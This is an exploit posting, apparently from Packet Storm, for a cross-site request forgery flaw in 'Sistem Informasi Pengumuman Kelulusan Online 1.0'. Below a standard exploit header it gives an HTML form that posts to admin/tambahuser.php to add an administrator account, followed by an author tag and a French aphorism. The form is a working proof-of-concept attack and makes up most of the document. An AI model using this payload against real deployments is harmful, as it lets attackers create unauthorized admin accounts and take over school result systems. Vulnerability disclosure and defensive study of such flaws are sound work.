Sistem Informasi Pengumuman Kelulusan Online 1.0 CSRF ≈ Packet Storm

# Exploit Title: Sistem Informasi Pengumuman Kelulusan Online 1.0 - Cross-Site Request Forgery (Add Admin)
# Google Dork: N/A
# Date: 2020-06-10
# Exploit Author: Extinction
# Vendor Homepage:
# Software Link:
# Version: latest
# Tested on: Linux,windows,macOS
# Description SpearSecurity :
# CSRF vulnerability was discovered in Sistem kelulusan.
# With this vulnerability, authorized users can be added to the system.
<form action="[path]admin/tambahuser.php" method="POST">
<input type="text" class="form-control" name="nama"
placeholder="Username" size="35">
<input type="text" class="form-control" name="username"
placeholder="Spear" size="35">
<input type="text" class="form-control" name="pass"
placeholder="Security" size="35">
<input type="submit" name="submit" id="submit" value="Simpan Data"
class="btn btn-primary" onclick="tb_remove()">
<h2> Author Extinction </h2>

Pensée du jour :

Ce que l'homme a fait ,

l'homme peut le défaire.


"No secure path in the world"